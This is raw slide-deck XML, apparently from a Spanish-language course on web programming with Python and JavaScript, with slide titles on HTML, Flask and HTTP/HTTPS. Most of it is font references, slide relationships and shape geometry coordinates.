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</p:sldIdLst>
  <p:sldSz cy="5143500" cx="9144000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Roboto"/>
      <p:regular r:id="rId73"/>
      <p:bold r:id="rId74"/>
      <p:italic r:id="rId75"/>
      <p:boldItalic r:id="rId76"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Mono"/>
      <p:regular r:id="rId77"/>
      <p:bold r:id="rId78"/>
      <p:italic r:id="rId79"/>
      <p:boldItalic r:id="rId8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1" roundtripDataSignature="AMtx7mjWuD1dlJ6xDY+cV9l6oZQjFXWc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EE1970-63D4-491F-806F-041E0D5E9D7A}">
  <a:tblStyle styleId="{B6EE1970-63D4-491F-806F-041E0D5E9D7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RobotoMono-boldItalic.fntdata"/><Relationship Id="rId81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Roboto-regular.fntdata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Roboto-italic.fntdata"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide24.xml"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto-bold.fntdata"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide27.xml"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-regular.fntdata"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide26.xml"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto-boldItalic.fntdata"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide29.xml"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-italic.fntdata"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide28.xml"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-bold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1" name="Google Shape;521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6" name="Google Shape;526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1" name="Google Shape;531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6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7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5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7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7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7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Programación Web con Python y JavaScript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HTML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 txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="222300" y="796800"/>
            <a:ext cx="8699400" cy="3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&lt;a href="url1"&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="20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  url2</a:t>
            </a:r>
            <a:endParaRPr sz="20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&lt;/a&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="20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Flask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HTTP y HTTPS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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475326" y="2746664"/>
            <a:ext cx="1332967" cy="846894"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2846704" w="4480560">
                <a:moveTo>
                  <a:pt x="4130450" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="351298" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283628" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229982" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185289" y="7231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="17140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102642" y="37801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66692" y="66692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37801" y="102642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17140" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7228" y="185289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="229787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="282970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="349738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="2496730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="2562844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="2616487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7237" y="2661203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17140" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37801" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66692" y="2779775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102642" y="2808666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="2829327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185264" y="2839237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229787" y="2844325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282970" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349738" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4128900" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4196565" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250210" y="2844325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294903" y="2839237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="2829327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377547" y="2808666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413500" y="2779775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442395" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472964" y="2661179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="2616680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="2563498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480188" y="2496730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480182" y="349738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="283628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="229982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472955" y="185264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442395" y="102642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413500" y="66692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377547" y="37801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="17140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294927" y="7231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250404" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4197219" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41304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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475326" y="2746664"/>
            <a:ext cx="1332967" cy="846894"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2846704" w="4480560">
                <a:moveTo>
                  <a:pt x="349738" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4130450" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4197217" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250400" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294923" y="7230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="17138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377545" y="37800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413496" y="66693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442391" y="102643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472961" y="185289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="229982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="283628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480188" y="351298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480188" y="2496730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="2563498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="2616680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472961" y="2661203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442391" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413496" y="2779776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377545" y="2808671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="2829337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294899" y="2839241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250206" y="2844327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4196564" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4128900" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349738" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282970" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229787" y="2844327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185264" y="2839241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="2829337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102643" y="2808671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66693" y="2779776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37800" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17138" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7230" y="2661179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="2616487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="2562844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2495180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="349738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="282970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="229787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7230" y="185264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17138" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37800" y="102643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66693" y="66693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102643" y="37800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="17138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185289" y="7230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229982" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283628" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351298" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349738" y="0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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="351989" y="3600838"/>
            <a:ext cx="1577797" cy="82933"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="278765" w="5303520">
                <a:moveTo>
                  <a:pt x="5163947" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="139377" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95325" y="7106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57065" y="26893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26893" y="57065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7106" y="95325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7106" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26893" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57065" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95325" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139377" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5163947" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5208003" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246264" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276435" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296220" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5303325" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296220" y="95325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276435" y="57065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246264" y="26893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5208003" y="7106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5163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351989" y="3600838"/>
            <a:ext cx="1577797" cy="82933"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="278765" w="5303520">
                <a:moveTo>
                  <a:pt x="139377" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5163947" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5207999" y="7105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246260" y="26891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276432" y="57062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296219" y="95323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5303325" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296219" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276432" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246260" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5207999" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5163947" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139377" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95323" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57062" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26891" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7105" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7105" y="95323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26891" y="57062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57062" y="26891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95323" y="7105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139377" y="0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545247" y="2816586"/>
            <a:ext cx="1194116" cy="708044"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2379979" w="4013835">
                <a:moveTo>
                  <a:pt x="3700232" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="314712" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254091" y="240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206031" y="1920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165992" y="6480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129430" y="15360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91954" y="33865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59748" y="59748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33865" y="91954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15360" y="129430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1920" y="205857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240" y="253503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="313320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="2066512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240" y="2125735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1920" y="2173792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6485" y="2213852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33865" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59748" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91954" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129430" y="2364472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205857" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253503" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313320" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3698840" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3759461" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807520" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3847556" y="2373346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921593" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953799" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979682" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3998192" y="2250392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="2173966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="2126323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013542" y="2066512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013537" y="313320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="254091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="206031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4007061" y="165970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979682" y="91954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953799" y="59748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921593" y="33865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3884112" y="15360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807694" y="1920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3760049" y="240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370023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545247" y="2816586"/>
            <a:ext cx="1194116" cy="708044"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2379979" w="4013835">
                <a:moveTo>
                  <a:pt x="313309" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3700232" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3760043" y="239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807686" y="1919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3847572" y="6477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921588" y="33863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953795" y="59746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979681" y="91952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3998192" y="129430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="206030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="254086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013542" y="314702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013542" y="2066512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="2126323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="2173966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4007066" y="2213852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979681" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953795" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921588" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3884112" y="2364472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807512" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3759455" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3698840" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313309" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253499" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205856" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165970" y="2373346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91952" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59746" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33863" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15353" y="2250392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1919" y="2173792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239" y="2125735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2065120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="313309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239" y="253499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1919" y="205856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6477" y="165970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33863" y="91952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59746" y="59746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91952" y="33863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129430" y="15353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206030" y="1919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254086" y="239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="314702" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313309" y="0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4182972" y="2291879"/>
            <a:ext cx="779907" cy="178108"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="516255" w="2260600">
                <a:moveTo>
                  <a:pt x="159366" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2100941" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2131367" y="122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2175889" y="3294"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2213538" y="17224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2243083" y="46771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2257012" y="84429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2260186" y="129236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2260308" y="160068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2260308" y="356418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2259331" y="411073"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2252496" y="449944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2229919" y="485390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2194477" y="507974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2155512" y="514808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2100229" y="515785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159366" y="515785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104705" y="514808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65833" y="507974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30389" y="485390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7809" y="449944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="976" y="410984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="355706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="159366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="976" y="104705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7809" y="65833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30389" y="30389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65833" y="7809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104793" y="976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="160068" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159366" y="0"/>
                </a:lnTo>
                <a:close/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4247022" y="2352501"/>
            <a:ext cx="383162" cy="56740"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="164464" w="1110615">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1110521" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1110521" y="164183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164183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4844631" y="2347085"/>
            <a:ext cx="67500" cy="67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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4182972" y="2463856"/>
            <a:ext cx="779907" cy="178108"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="516255" w="2260600">
                <a:moveTo>
                  <a:pt x="159366" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2100941" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2131367" y="122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2175889" y="3294"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2213538" y="17224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2243083" y="46771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2257012" y="84429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2260186" y="129236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2260308" y="160068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2260308" y="356418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2259331" y="411073"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2252496" y="449944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2229919" y="485390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2194477" y="507974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2155512" y="514808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2100229" y="515785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159366" y="515785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104705" y="514808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65833" y="507974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30389" y="485390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7809" y="449944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="976" y="410984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="355706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="159366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="976" y="104705"/>
